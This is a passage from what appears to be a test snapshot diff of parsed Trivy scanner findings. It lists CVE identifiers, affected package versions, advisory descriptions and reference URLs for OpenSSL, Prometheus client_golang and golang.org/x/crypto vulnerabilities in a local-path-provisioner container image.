"https://bugzilla.redhat.com/show_bug.cgi?id=2107390", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107392", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23648", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1962", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21673", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21698", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21702", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21703", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21713", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28131", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30631", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30633", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://errata.almalinux.org/9/ALSA-2022-8057.html", - "https://errata.rockylinux.org/RLSA-2022:8057", - "https://github.com/advisories/GHSA-cg3q-j54f-5p7p", - "https://github.com/prometheus/client_golang/pull/962", - "https://github.com/prometheus/client_golang/pull/987", - "https://github.com/prometheus/client_golang/releases/tag/v1.11.1", - "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p", - "https://linux.oracle.com/cve/CVE-2022-21698.html", - "https://linux.oracle.com/errata/ELSA-2022-8057.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2IK53GWZ475OQ6ENABKMJMTOBZG6LXUR/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2PFW6Q2LXXWTFRTMTRN4ZGADFRQPKJ3D/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/36GUEPA5TPSC57DZTPYPBL6T7UPQ2FRH/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3L6GDN5S5QZSCFKWD3GKL2RDZQ6B4UWA/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4KDETHL5XCT6RZN2BBNOCEXRZ2W3SFU3/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5OGNAFVXSMTTT2UPH6CS3IH6L3KM42Q7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7V7I72LSQ3IET3QJR6QPAVGJZ4CBDLN5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AK7CJBCGERCRXYUR2EWDSSDVAQMTAZGX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FY3N7H6VSDZM37B4SKM2PFFCUWU7QYWN/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HLAQRRGNSO5MYCPAXGPH2OCSHOGHSQMQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KBMVIQFKQDSSTHVVJWJ4QH6TW3JVB7XZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MH6ALXEQXIFQRQFNJ5Y2MJ5DFPIX76VN/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RN7JGC2LVHPEGSJYODFUV5FEKPBVG4D7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SASRKYHT5ZFSVMJUQUG3UAEQRJYGJKAR/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZKORFJTRRDJCWBTJPISKKCVMMMJBIRLG/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-21698", - "https://pkg.go.dev/vuln/GO-2022-0322", - "https://www.cve.org/CVERecord?id=CVE-2022-21698", - ], - }, - "category": "Vulnerability", - "description": "client_golang is the instrumentation library for Go applications in Prometheus, and the promhttp package in client_golang provides tooling around HTTP servers and clients. In client_golang prior to version 1.11.1, HTTP server is susceptible to a Denial of Service through unbounded cardinality, and potential memory exhaustion, when handling requests with non-standard HTTP methods. In order to be affected, an instrumented software must use any of \`promhttp.InstrumentHandler*\` middleware except \`RequestsInFlight\`; not filter any specific methods (e.g GET) before middleware; pass metric with \`method\` label name to our middleware; and not have any firewall/LB/proxy that filters away requests with unknown \`method\`. client_golang version 1.11.1 contains a patch for this issue. Several workarounds are available, including removing the \`method\` label name from counter/gauge used in the InstrumentHandler; turning off affected promhttp handlers; adding custom middleware before promhttp handler that will sanitize the request method given by Go http.Request; and using a reverse proxy or web application firewall, configured to only allow a limited set of methods.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "Denial of service using InstrumentHandlerCounter", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-21698", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8057", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-21698", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2044628", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2045880", + "value": "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2050648", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2050742", + "value": "https://security.netapp.com/advisory/ntap-20220321-0002/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2050743", + "value": "https://security.netapp.com/advisory/ntap-20220429-0005/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2065290", + "value": "https://support.apple.com/kb/HT213255", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107342", + "value": "https://support.apple.com/kb/HT213256", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "https://support.apple.com/kb/HT213257", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "https://ubuntu.com/security/notices/USN-5328-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107376", + "value": "https://ubuntu.com/security/notices/USN-5328-2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0778", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://www.debian.org/security/2022/dsa-5103", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://www.openssl.org/news/secadv/20220315.txt", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107390", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107392", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2044628", + "value": "https://www.tenable.com/security/tns-2022-06", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2045880", + "value": "https://www.tenable.com/security/tns-2022-07", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050648", + "value": "https://www.tenable.com/security/tns-2022-08", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050742", + "value": "https://www.tenable.com/security/tns-2022-09", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1i-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2020-1971", + "installedVersion": "1.1.1g-r0", + "packageName": "libssl1.1", + "references": [ + "http://www.openwall.com/lists/oss-security/2021/09/14/2", + "https://access.redhat.com/security/cve/CVE-2020-1971", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1971", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2154ab83e14ede338d2ede9bbe5cdfce5d5a6c9e", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=f960d81215ebf3f65e03d4d5d857fb9b666d6920", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44676", + "https://linux.oracle.com/cve/CVE-2020-1971.html", + "https://linux.oracle.com/errata/ELSA-2021-9150.html", + "https://lists.apache.org/thread.html/r63c6f2dd363d9b514d0a4bcf624580616a679898cc14c109a49b750c@%3Cdev.tomcat.apache.org%3E", + "https://lists.apache.org/thread.html/rbb769f771711fb274e0a4acb1b5911c8aab544a6ac5e8c12d40c5143@%3Ccommits.pulsar.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2020/12/msg00020.html", + "https://lists.debian.org/debian-lts-announce/2020/12/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DGSI34Y5LQ5RYXN4M2I5ZQT65LFVDOUU/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWPSSZNZOBJU2YR6Z4TGHXKYW3YP5QG7/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-1971", + "https://security.FreeBSD.org/advisories/FreeBSD-SA-20:33.openssl.asc", + "https://security.gentoo.org/glsa/202012-13", + "https://security.netapp.com/advisory/ntap-20201218-0005/", + "https://security.netapp.com/advisory/ntap-20210513-0002/", + "https://ubuntu.com/security/notices/USN-4662-1", + "https://ubuntu.com/security/notices/USN-4745-1", + "https://www.cve.org/CVERecord?id=CVE-2020-1971", + "https://www.debian.org/security/2020/dsa-4807", + "https://www.openssl.org/news/secadv/20201208.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2021.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2020-11", + "https://www.tenable.com/security/tns-2021-09", + "https://www.tenable.com/security/tns-2021-10", + ], + }, + "category": "Vulnerability", + "description": "The X.509 GeneralName type is a generic type for representing different types of names. One of those name types is known as EDIPartyName. OpenSSL provides a function GENERAL_NAME_cmp which compares different instances of a GENERAL_NAME to see if they are equal or not. This function behaves incorrectly when both GENERAL_NAMEs contain an EDIPARTYNAME. A NULL pointer dereference and a crash may occur leading to a possible denial of service attack. OpenSSL itself uses the GENERAL_NAME_cmp function for two purposes: 1) Comparing CRL distribution point names between an available CRL and a CRL distribution point embedded in an X509 certificate 2) When verifying that a timestamp response token signer matches the timestamp authority name (exposed via the API functions TS_RESP_verify_response and TS_RESP_verify_token) If an attacker can control both items being compared then that attacker could trigger a crash. For example if the attacker can trick a client or server into checking a malicious certificate against a malicious CRL then this may occur. Note that some applications automatically download CRLs based on a URL embedded in a certificate. This checking happens prior to the signatures on the certificate and CRL being verified. OpenSSL's s_server, s_client and verify tools have support for the "-crl_download" option which implements automatic CRL downloading and this attack has been demonstrated to work against those tools. Note that an unrelated bug means that affected versions of OpenSSL cannot parse or construct correct encodings of EDIPARTYNAME. However it is possible to construct a malformed EDIPARTYNAME that OpenSSL's parser will accept and hence trigger this attack. All OpenSSL 1.1.1 and 1.0.2 versions are affected by this issue. Other OpenSSL releases are out of support and have not been checked. Fixed in OpenSSL 1.1.1i (Affected 1.1.1-1.1.1h). Fixed in OpenSSL 1.0.2x (Affected 1.0.2-1.0.2w).", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "openssl: EDIPARTYNAME NULL pointer de-reference", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050743", + "value": "https://avd.aquasec.com/nvd/cve-2020-1971", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2055349", + "value": "http://www.openwall.com/lists/oss-security/2021/09/14/2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2065290", + "value": "https://access.redhat.com/security/cve/CVE-2020-1971", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104367", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107342", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1971", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2154ab83e14ede338d2ede9bbe5cdfce5d5a6c9e", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=f960d81215ebf3f65e03d4d5d857fb9b666d6920", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107376", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44676", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://linux.oracle.com/cve/CVE-2020-1971.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://linux.oracle.com/errata/ELSA-2021-9150.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://lists.apache.org/thread.html/r63c6f2dd363d9b514d0a4bcf624580616a679898cc14c109a49b750c@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107390", + "value": "https://lists.apache.org/thread.html/rbb769f771711fb274e0a4acb1b5911c8aab544a6ac5e8c12d40c5143@%3Ccommits.pulsar.apache.org%3E", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107392", + "value": "https://lists.debian.org/debian-lts-announce/2020/12/msg00020.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23648", + "value": "https://lists.debian.org/debian-lts-announce/2020/12/msg00021.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DGSI34Y5LQ5RYXN4M2I5ZQT65LFVDOUU/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1962", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWPSSZNZOBJU2YR6Z4TGHXKYW3YP5QG7/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21673", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1971", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21698", + "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-20:33.openssl.asc", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21702", + "value": "https://security.gentoo.org/glsa/202012-13", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21703", + "value": "https://security.netapp.com/advisory/ntap-20201218-0005/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21713", + "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28131", + "value": "https://ubuntu.com/security/notices/USN-4662-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://ubuntu.com/security/notices/USN-4745-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30631", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-1971", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://www.debian.org/security/2020/dsa-4807", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30633", + "value": "https://www.openssl.org/news/secadv/20201208.txt", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8057.html", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8057", + "value": "https://www.oracle.com/security-alerts/cpujan2021.html", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-cg3q-j54f-5p7p", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "https://github.com/prometheus/client_golang/pull/962", + "value": "https://www.tenable.com/security/tns-2020-11", }, { "type": "URL", - "value": "https://github.com/prometheus/client_golang/pull/987", + "value": "https://www.tenable.com/security/tns-2021-09", }, { "type": "URL", - "value": "https://github.com/prometheus/client_golang/releases/tag/v1.11.1", + "value": "https://www.tenable.com/security/tns-2021-10", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1j-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-23841", + "installedVersion": "1.1.1g-r0", + "packageName": "libssl1.1", + "references": [ + "http://seclists.org/fulldisclosure/2021/May/67", + "http://seclists.org/fulldisclosure/2021/May/68", + "http://seclists.org/fulldisclosure/2021/May/70", + "https://access.redhat.com/security/cve/CVE-2021-23841", + "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23841", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=122a19ab48091c657f7cb1fb3af9fc07bd557bbf", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8252ee4d90f3f2004d3d0aeeed003ad49c9a7807", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", + "https://github.com/advisories/GHSA-84rm-qf37-fgc2", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "https://linux.oracle.com/cve/CVE-2021-23841.html", + "https://linux.oracle.com/errata/ELSA-2021-9561.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-23841", + "https://rustsec.org/advisories/RUSTSEC-2021-0058", + "https://rustsec.org/advisories/RUSTSEC-2021-0058.html", + "https://security.gentoo.org/glsa/202103-03", + "https://security.netapp.com/advisory/ntap-20210219-0009/", + "https://security.netapp.com/advisory/ntap-20210513-0002/", + "https://support.apple.com/kb/HT212528", + "https://support.apple.com/kb/HT212529", + "https://support.apple.com/kb/HT212534", + "https://ubuntu.com/security/notices/USN-4738-1", + "https://ubuntu.com/security/notices/USN-4745-1", + "https://www.cve.org/CVERecord?id=CVE-2021-23841", + "https://www.debian.org/security/2021/dsa-4855", + "https://www.openssl.org/news/secadv/20210216.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-03", + "https://www.tenable.com/security/tns-2021-09", + ], + }, + "category": "Vulnerability", + "description": "The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "openssl: NULL pointer dereference in X509_issuer_and_serial_hash()", + "references": [ { "type": "URL", - "value": "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p", + "value": "https://avd.aquasec.com/nvd/cve-2021-23841", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-21698.html", + "value": "http://seclists.org/fulldisclosure/2021/May/67", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8057.html", + "value": "http://seclists.org/fulldisclosure/2021/May/68", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2IK53GWZ475OQ6ENABKMJMTOBZG6LXUR/", + "value": "http://seclists.org/fulldisclosure/2021/May/70", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2PFW6Q2LXXWTFRTMTRN4ZGADFRQPKJ3D/", + "value": "https://access.redhat.com/security/cve/CVE-2021-23841", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/36GUEPA5TPSC57DZTPYPBL6T7UPQ2FRH/", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3L6GDN5S5QZSCFKWD3GKL2RDZQ6B4UWA/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23841", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4KDETHL5XCT6RZN2BBNOCEXRZ2W3SFU3/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=122a19ab48091c657f7cb1fb3af9fc07bd557bbf", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5OGNAFVXSMTTT2UPH6CS3IH6L3KM42Q7/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7V7I72LSQ3IET3QJR6QPAVGJZ4CBDLN5/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8252ee4d90f3f2004d3d0aeeed003ad49c9a7807", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AK7CJBCGERCRXYUR2EWDSSDVAQMTAZGX/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "value": "https://github.com/advisories/GHSA-84rm-qf37-fgc2", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FY3N7H6VSDZM37B4SKM2PFFCUWU7QYWN/", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HLAQRRGNSO5MYCPAXGPH2OCSHOGHSQMQ/", + "value": "https://linux.oracle.com/cve/CVE-2021-23841.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "value": "https://linux.oracle.com/errata/ELSA-2021-9561.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KBMVIQFKQDSSTHVVJWJ4QH6TW3JVB7XZ/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23841", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MH6ALXEQXIFQRQFNJ5Y2MJ5DFPIX76VN/", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0058", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RN7JGC2LVHPEGSJYODFUV5FEKPBVG4D7/", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0058.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SASRKYHT5ZFSVMJUQUG3UAEQRJYGJKAR/", + "value": "https://security.gentoo.org/glsa/202103-03", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZKORFJTRRDJCWBTJPISKKCVMMMJBIRLG/", + "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-21698", + "value": "https://support.apple.com/kb/HT212528", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0322", + "value": "https://support.apple.com/kb/HT212529", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-21698", + "value": "https://support.apple.com/kb/HT212534", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20211202192323-5770296d904e", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-43565", - "installedVersion": "v0.0.0-20201216223049-8b5274cf687f", - "packageName": "golang.org/x/crypto", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-43565", - "https://github.com/advisories/GHSA-gwc9-m7rh-j2ww", - "https://go.dev/cl/368814/", - "https://go.dev/issues/49932", - "https://groups.google.com/forum/#!forum/golang-announce", - "https://groups.google.com/g/golang-announce/c/2AR1sKiM-Qs", - "https://nvd.nist.gov/vuln/detail/CVE-2021-43565", - "https://pkg.go.dev/vuln/GO-2022-0968", - "https://www.cve.org/CVERecord?id=CVE-2021-43565", - ], - }, - "category": "Vulnerability", - "description": "The x/crypto/ssh package before 0.0.0-20211202192323-5770296d904e of golang.org/x/crypto allows an attacker to panic an SSH server.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "golang.org/x/crypto: empty plaintext packet causes panic", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-43565", + "value": "https://ubuntu.com/security/notices/USN-4738-1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-43565", + "value": "https://ubuntu.com/security/notices/USN-4745-1", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-gwc9-m7rh-j2ww", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-23841", }, { "type": "URL", - "value": "https://go.dev/cl/368814/", + "value": "https://www.debian.org/security/2021/dsa-4855", }, { "type": "URL", - "value": "https://go.dev/issues/49932", + "value": "https://www.openssl.org/news/secadv/20210216.txt", }, { "type": "URL", - "value": "https://groups.google.com/forum/#!forum/golang-announce", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": 